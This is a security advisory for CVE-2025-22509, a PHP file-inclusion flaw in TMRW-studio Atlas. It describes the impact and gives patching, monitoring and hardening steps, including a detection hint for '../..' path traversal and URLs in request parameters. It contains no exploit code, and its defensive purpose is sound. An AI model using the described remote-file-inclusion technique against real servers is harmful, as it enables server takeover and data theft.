A critical vulnerability, identified as CVE-2025-22509, exists in the TMRW-studio Atlas software. This flaw allows a remote, unauthenticated attacker to trick the application into running malicious code from an external source, potentially leading to a complete takeover of the affected server. Immediate patching is required to prevent potential data breaches, service disruption, and further network compromise.

The vulnerability is an Improper Control of a Filename for an Include/Require Statement in a PHP Program, commonly known as Remote File Inclusion (RFI) or Local File Inclusion (LFI). The application fails to properly sanitize user-supplied input that is used to construct a file path for a PHP include or require statement. A remote, unauthenticated attacker can exploit this by crafting a request that points to a malicious PHP file hosted on an attacker-controlled server, which the application will then download and execute with the permissions of the web server.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of the server hosting the TMRW-studio Atlas application. Potential consequences include theft of sensitive corporate or customer data, deployment of ransomware, disruption of business operations, and the use of the compromised server as a pivot point to attack other internal systems. The potential for significant financial, reputational, and operational damage is extremely high.

Immediate Action: Immediately update the TMRW-studio Atlas software to the latest version available (a version later than 2.1.0) which addresses this vulnerability. After patching, thoroughly review web server access logs and system logs for any signs of compromise or exploitation attempts that may have occurred before the patch was applied.

Proactive Monitoring: Monitor web server access logs for requests containing URLs or suspicious file path traversals (e.g., ../..) in GET/POST parameters. Scrutinize outbound network traffic from the Atlas server for connections to unusual or untrusted IP addresses, as this could indicate a successful RFI attack. Implement file integrity monitoring on the application server to detect unauthorized file modifications.

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

• Deploy a Web Application Firewall (WAF) with rulesets designed to detect and block RFI/LFI attack patterns.
• In the server's php.ini configuration, disable allow_url_fopen and allow_url_include to prevent the PHP engine from including remote files.
• Enforce strict file system permissions to limit the web server process's access to sensitive files outside of the web root directory.

Public Exploit Available: false

Given the critical CVSS score of 9.8, this vulnerability represents a severe and immediate threat to the organization. We strongly recommend that all instances of TMRW-studio Atlas version 2.1.0 and earlier are identified and patched immediately without delay. Due to the high risk of complete system compromise, this remediation effort should be treated as the highest priority.